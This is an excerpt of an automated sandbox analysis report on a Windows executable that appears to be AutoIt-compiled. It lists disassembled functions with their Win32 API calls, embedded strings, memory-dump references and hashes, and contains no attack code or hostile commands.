                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: SendString$_memmove_wcslen
                                                                                  • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                                  • API String ID: 369157077-1007645807
                                                                                  • Opcode ID: f963851227cb2bcafec7df3ef8778280fda42e08bc5c03876a4728c3ed9f2a05
                                                                                  • Instruction ID: e81aaa69409cfefceaf3864659f825962b2ddf67c6d06b6a861a29a56a66176d
                                                                                  • Opcode Fuzzy Hash: f963851227cb2bcafec7df3ef8778280fda42e08bc5c03876a4728c3ed9f2a05
                                                                                  • Instruction Fuzzy Hash: 7F21A83168021D66E720FB95DC46FFE7368AF40700F20087BFA14B71D1DAB4A949879D
                                                                                  APIs
                                                                                  • GetParent.USER32 ref: 00445BF8
                                                                                  • GetClassNameW.USER32(00000000,?,00000100), ref: 00445C0D
                                                                                  • __wcsicoll.LIBCMT ref: 00445C33
                                                                                  • __wcsicoll.LIBCMT ref: 00445C4F
                                                                                  • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00445CA9
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: __wcsicoll$ClassMessageNameParentSend
                                                                                  • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                                  • API String ID: 3125838495-3381328864
                                                                                  • Opcode ID: 17bab07e815737d0aecd422002c3b7a0f260523ca91fc6be5302b60c0052203b
                                                                                  • Instruction ID: b9a51c7f116d0e73852bd225d20f6d8bcb5f39b8f57bd3164038c04ed7d94027
                                                                                  • Opcode Fuzzy Hash: 17bab07e815737d0aecd422002c3b7a0f260523ca91fc6be5302b60c0052203b
                                                                                  • Instruction Fuzzy Hash: C6110AB1E447017BFE10BA659D46EBB339C9B54B11F00051BFE44D7242F6ACA94147A9
                                                                                  APIs
                                                                                  • SendMessageW.USER32(?,?,000000FF,?), ref: 004492A4
                                                                                  • SendMessageW.USER32(?,?,00000000,00000000), ref: 004492B7
                                                                                  • CharNextW.USER32(?,?,?,000000FF,?), ref: 004492E9
                                                                                  • SendMessageW.USER32(?,?,00000000,00000000), ref: 00449301
                                                                                  • SendMessageW.USER32(?,?,00000000,?), ref: 00449332
                                                                                  • SendMessageW.USER32(?,?,000000FF,?), ref: 00449349
                                                                                  • SendMessageW.USER32(?,?,00000000,00000000), ref: 0044935C
                                                                                  • SendMessageW.USER32(?,00000402,?), ref: 00449399
                                                                                  • SendMessageW.USER32(?,000000C2,00000001,?), ref: 0044940D
                                                                                  • SendMessageW.USER32(?,00001002,00000000,?), ref: 00449477
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessageSend$CharNext
                                                                                  • String ID:
                                                                                  • API String ID: 1350042424-0
                                                                                  • Opcode ID: 0066c399e5a393c923680e2e66105d8530035c3b09cc99687380ea8ee93f4497
                                                                                  • Instruction ID: 867fdc7b80e212b75fe5daf06e5219747a853435bb2a874e280223eddbea68d3
                                                                                  • Opcode Fuzzy Hash: 0066c399e5a393c923680e2e66105d8530035c3b09cc99687380ea8ee93f4497
                                                                                  • Instruction Fuzzy Hash: 5B81D535A00119BBEB10CF85DD80FFFB778FB55720F10825AFA14AA280D7B99D4197A4
                                                                                  APIs
                                                                                    • Part of subcall function 004536F7: CharLowerBuffW.USER32(?,?), ref: 0045370C
                                                                                    • Part of subcall function 00445AE0: _wcslen.LIBCMT ref: 00445AF0
                                                                                  • GetDriveTypeW.KERNEL32(?), ref: 004787B9
                                                                                  • _wcscpy.LIBCMT ref: 004787E5
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: BuffCharDriveLowerType_wcscpy_wcslen
                                                                                  • String ID: \VH$a$all$cdrom$fixed$network$ramdisk$removable$unknown
                                                                                  • API String ID: 3052893215-2127371420
                                                                                  • Opcode ID: d2cef25e8da5c5e3ff62787a2d5bf57075b394b4544bde345958b2b0489681b6
                                                                                  • Instruction ID: 541bc2b2506c052d744bcb7e7e177e26c036821b53f5a58429f0f0853ea8de24
                                                                                  • Opcode Fuzzy Hash: d2cef25e8da5c5e3ff62787a2d5bf57075b394b4544bde345958b2b0489681b6
                                                                                  • Instruction Fuzzy Hash: 4761C1716443018BD700EF14CC85B9BB7D4AB84348F14892FF949AB382DB79E94987AB
                                                                                  APIs
                                                                                  • LoadStringW.USER32(?,00000066,?,00000FFF), ref: 0045E77F
                                                                                    • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                    • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                  • LoadStringW.USER32(?,?,?,00000FFF), ref: 0045E7A0
                                                                                  • __swprintf.LIBCMT ref: 0045E7F7
                                                                                  • _wprintf.LIBCMT ref: 0045E8B3
                                                                                  • _wprintf.LIBCMT ref: 0045E8D7
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: LoadString_wprintf$__swprintf_memmove_wcslen
                                                                                  • String ID: Error: $%s (%d) : ==> %s:$%s (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                                  • API String ID: 2295938435-2354261254
                                                                                  • Opcode ID: bb058454d561a71d3962b6834df81d7638d9abf9c215052f6de6d44e2e152ebf
                                                                                  • Instruction ID: 453f5dd12ee62c270a242db3517b58e8b6225e49c0ff470bc5072f32437c925c
                                                                                  • Opcode Fuzzy Hash: bb058454d561a71d3962b6834df81d7638d9abf9c215052f6de6d44e2e152ebf
                                                                                  • Instruction Fuzzy Hash: 6A519E71A10219ABDB14EB91CC85EEF7778AF44314F14407EF90477292DB78AE49CBA8
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: __swprintf_wcscpy$__i64tow__itow
                                                                                  • String ID: %.15g$0x%p$False$True
                                                                                  • API String ID: 3038501623-2263619337
                                                                                  • Opcode ID: dbd07ee36d68efbdb82b47f6bbdb5a558a403895529f1bd62c5843a789ef215e
                                                                                  • Instruction ID: fd507a47f7d2c8f7f5848ea17d112ce969af4838d766d220e6d3988dad71e25c
                                                                                  • Opcode Fuzzy Hash: dbd07ee36d68efbdb82b47f6bbdb5a558a403895529f1bd62c5843a789ef215e
                                                                                  • Instruction Fuzzy Hash: 264108729001005BDB10EF75DC42FAAB364EF55306F0445ABFE09CB242EA39DA48C79A
                                                                                  APIs
                                                                                  • LoadStringW.USER32(?,00000066,?,00000FFF), ref: 0045E580
                                                                                    • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                    • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                  • LoadStringW.USER32(?,00000072,?,00000FFF), ref: 0045E59F
                                                                                  • __swprintf.LIBCMT ref: 0045E5F6
                                                                                  • _wprintf.LIBCMT ref: 0045E6A3
                                                                                  • _wprintf.LIBCMT ref: 0045E6C7
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: LoadString_wprintf$__swprintf_memmove_wcslen
                                                                                  • String ID: Error: $%s (%d) : ==> %s:$%s (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                                  • API String ID: 2295938435-8599901
                                                                                  • Opcode ID: c66a723599ffab058b3f3cea1f0729b04811ebb293e3d225dd53f192e4035716
                                                                                  • Instruction ID: ff3e2b23dced8a629e5b21f12e79e468b5cd48208a3d74017576322ff0354a8f
                                                                                  • Opcode Fuzzy Hash: c66a723599ffab058b3f3cea1f0729b04811ebb293e3d225dd53f192e4035716
                                                                                  • Instruction Fuzzy Hash: 9A519171D00109ABDB14EBA1C845EEF7778EF44304F50847EF91477292EA78AE49CBA8
                                                                                  APIs
                                                                                  • timeGetTime.WINMM ref: 00443B67
                                                                                    • Part of subcall function 0040C620: timeGetTime.WINMM(0042DD5D), ref: 0040C620
                                                                                  • Sleep.KERNEL32(0000000A), ref: 00443B9F
                                                                                  • FindWindowExW.USER32(?,00000000,BUTTON,00000000), ref: 00443BC8
                                                                                  • SetActiveWindow.USER32(?), ref: 00443BEC
                                                                                  • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00443BFC
                                                                                  • SendMessageW.USER32(?,00000010,00000000,00000000), ref: 00443C22
                                                                                  • Sleep.KERNEL32(000000FA), ref: 00443C2D
                                                                                  • IsWindow.USER32(?), ref: 00443C3A
                                                                                  • EndDialog.USER32(?,00000000), ref: 00443C4C
                                                                                    • Part of subcall function 004439C1: GetWindowThreadProcessId.USER32(?,00000000), ref: 004439E4
                                                                                    • Part of subcall function 004439C1: GetCurrentThreadId.KERNEL32 ref: 004439EB
                                                                                    • Part of subcall function 004439C1: AttachThreadInput.USER32(00000000), ref: 004439F2
                                                                                  • EnumThreadWindows.USER32(00000000,Function_00033D09,00000000), ref: 00443C6B
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: ThreadWindow$MessageSendSleepTimetime$ActiveAttachCurrentDialogEnumFindInputProcessWindows
                                                                                  • String ID: BUTTON
                                                                                  • API String ID: 1834419854-3405671355
                                                                                  • Opcode ID: 0b90b562b2b8ddd8d32d3d53e67965f547c0866e24595f66544518a968b379f6
                                                                                  • Instruction ID: 3c6370bb7d17ad47abda0b7088cfd3672c19e1ca6c3f529de1b12449ce3ad6f8
                                                                                  • Opcode Fuzzy Hash: 0b90b562b2b8ddd8d32d3d53e67965f547c0866e24595f66544518a968b379f6
                                                                                  • Instruction Fuzzy Hash: 6B31E676784200BFE3349F74FD99F5A3B58AB55B22F10083AF600EA2A1D6B5A441876C
                                                                                  APIs
                                                                                  • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,?,?,?,0042820D,?,?,?,#include depth exceeded. Make sure there are no recursive includes,?), ref: 00454039
                                                                                  • LoadStringW.USER32(00000000), ref: 00454040
                                                                                    • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                    • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                  • _wprintf.LIBCMT ref: 00454074
                                                                                  • __swprintf.LIBCMT ref: 004540A3
                                                                                  • MessageBoxW.USER32(00000000,?,?,00011010), ref: 0045410F
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: HandleLoadMessageModuleString__swprintf_memmove_wcslen_wprintf
                                                                                  • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                                                  • API String ID: 455036304-4153970271
                                                                                  • Opcode ID: 0cc89bd23a2e2e53ac7bb2b5ed0e913a3f1e972501752cb0da19f3bd95e8304c
                                                                                  • Instruction ID: e2f14448b15a7dab571624068eda089460c560eca1c8ebe4dd0daaccfe0aa2c5
                                                                                  • Opcode Fuzzy Hash: 0cc89bd23a2e2e53ac7bb2b5ed0e913a3f1e972501752cb0da19f3bd95e8304c
                                                                                  • Instruction Fuzzy Hash: 3B31E872B0011997CB00EF95CD069AE3378AF88714F50445EFA0877282D678AE45C7A9
                                                                                  APIs
                                                                                  • SafeArrayAccessData.OLEAUT32(0000007F,?), ref: 00467D63
                                                                                  • SafeArrayAccessData.OLEAUT32(0000007F,0000007F), ref: 00467DDC
                                                                                  • SafeArrayGetVartype.OLEAUT32(0000007F,?), ref: 00467E71
                                                                                  • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00467E9D
                                                                                  • _memmove.LIBCMT ref: 00467EB8
                                                                                  • SafeArrayUnaccessData.OLEAUT32(00000000), ref: 00467EC1
                                                                                  • SafeArrayAccessData.OLEAUT32(0000007F,?), ref: 00467EDE
                                                                                  • _memmove.LIBCMT ref: 00467F6C
                                                                                  • SafeArrayAccessData.OLEAUT32(0000007F,?), ref: 00467FC1
                                                                                  • SafeArrayUnaccessData.OLEAUT32(00000004), ref: 00467FAB
                                                                                    • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                                                                    • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                                                                    • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                                                                  • SafeArrayUnaccessData.OLEAUT32(00479A50), ref: 00467E48
                                                                                    • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                  • SafeArrayUnaccessData.OLEAUT32(00479A50), ref: 00468030
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: ArraySafe$Data$Access$Unaccess$_memmovestd::exception::exception$Exception@8ThrowVartype_malloc
                                                                                  • String ID:
                                                                                  • API String ID: 2170234536-0
                                                                                  • Opcode ID: aa00afaeb95d016149156b33273ce501c4b0800cd775f7336c4c4d99d01e60ec
                                                                                  • Instruction ID: 6369f5c3f22445f0d5bf5c4520e4337682cbd46778e63a39b460943b9460954a
                                                                                  • Opcode Fuzzy Hash: aa00afaeb95d016149156b33273ce501c4b0800cd775f7336c4c4d99d01e60ec
                                                                                  • Instruction Fuzzy Hash: 26B124716042059FD700CF59D884BAEB7B5FF88308F24856EEA05DB351EB3AD845CB6A
                                                                                  APIs
                                                                                  • GetKeyboardState.USER32(?), ref: 00453CE0
                                                                                  • SetKeyboardState.USER32(?), ref: 00453D3B
                                                                                  • GetAsyncKeyState.USER32(000000A0), ref: 00453D5E
                                                                                  • GetKeyState.USER32(000000A0), ref: 00453D75
                                                                                  • GetAsyncKeyState.USER32(000000A1), ref: 00453DA4
                                                                                  • GetKeyState.USER32(000000A1), ref: 00453DB5
                                                                                  • GetAsyncKeyState.USER32(00000011), ref: 00453DE1
                                                                                  • GetKeyState.USER32(00000011), ref: 00453DEF
                                                                                  • GetAsyncKeyState.USER32(00000012), ref: 00453E18
                                                                                  • GetKeyState.USER32(00000012), ref: 00453E26
                                                                                  • GetAsyncKeyState.USER32(0000005B), ref: 00453E4F
                                                                                  • GetKeyState.USER32(0000005B), ref: 00453E5D
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: State$Async$Keyboard
                                                                                  • String ID:
                                                                                  • API String ID: 541375521-0
                                                                                  • Opcode ID: a3f88cab2abdfc68c44a637c7b6f2bd83c4aa3bfdff3a706604d8f1b20d6ef18
                                                                                  • Instruction ID: 009fbf1908f75ed0a62addf5985db529f64a747a45b1090b1102dc3b9208550d
                                                                                  • Opcode Fuzzy Hash: a3f88cab2abdfc68c44a637c7b6f2bd83c4aa3bfdff3a706604d8f1b20d6ef18
                                                                                  • Instruction Fuzzy Hash: BC61DD3190478829FB329F6488057EBBBF45F12346F08459ED9C2162C3D7AC6B4CCB65
                                                                                  APIs
                                                                                  • GetDlgItem.USER32(?,00000001), ref: 004357DB
                                                                                  • GetWindowRect.USER32(00000000,?), ref: 004357ED
                                                                                  • MoveWindow.USER32(?,0000000A,?,?,?,00000000), ref: 00435857
                                                                                  • GetDlgItem.USER32(?,00000002), ref: 0043586A
                                                                                  • GetWindowRect.USER32(00000000,?), ref: 0043587C
                                                                                  • MoveWindow.USER32(?,?,00000000,?,00000001,00000000), ref: 004358CE
                                                                                  • GetDlgItem.USER32(?,000003E9), ref: 004358DC
                                                                                  • GetWindowRect.USER32(00000000,?), ref: 004358EE
                                                                                  • MoveWindow.USER32(?,0000000A,00000000,?,?,00000000), ref: 00435933
                                                                                  • GetDlgItem.USER32(?,000003EA), ref: 00435941
                                                                                  • MoveWindow.USER32(00000000,0000000A,0000000A,?,-000000FB,00000000), ref: 0043595A
                                                                                  • InvalidateRect.USER32(?,00000000,00000001), ref: 00435967
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: Window$ItemMoveRect$Invalidate
                                                                                  • String ID:
                                                                                  • API String ID: 3096461208-0
                                                                                  • Opcode ID: 5d52927da84fb547f57ff0a94c85d4d7e4cc3ec4f802ea2f498aab0433028225
                                                                                  • Instruction ID: 6af1b44a8b8b1dd3dfd8c00d901dfbe31295268d39f582813a56aed3f3dd18d2
                                                                                  • Opcode Fuzzy Hash: 5d52927da84fb547f57ff0a94c85d4d7e4cc3ec4f802ea2f498aab0433028225
                                                                                  • Instruction Fuzzy Hash: 7C515FB1B00609ABCB18DF68CD95AAEB7B9EF88310F148529F905E7390E774ED008B54
                                                                                  APIs
                                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 004714DC
                                                                                  • LoadImageW.USER32(00000000,?,00000000,00000000,00000000,00002010), ref: 004714F7
                                                                                  • SendMessageW.USER32(?,000000F7,00000000,00000000), ref: 00471510
                                                                                  • DeleteObject.GDI32(?), ref: 0047151E
                                                                                  • DestroyIcon.USER32(?,?,000000F7,00000000,00000000,?,000000F0), ref: 0047152C
                                                                                  • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00002010), ref: 0047156F
                                                                                  • SendMessageW.USER32(?,000000F7,00000001,00000000), ref: 00471588
                                                                                  • ExtractIconExW.SHELL32(?,?,?,?,00000001), ref: 004715A9
                                                                                  • DestroyIcon.USER32(?,?,?,?,?,?,000000F0), ref: 004715CD
                                                                                  • SendMessageW.USER32(?,000000F7,00000001,?), ref: 004715DC
                                                                                  • DeleteObject.GDI32(?), ref: 004715EA
                                                                                  • DestroyIcon.USER32(?,?,000000F7,00000001,?,?,?,?,?,?,000000F0), ref: 004715F8
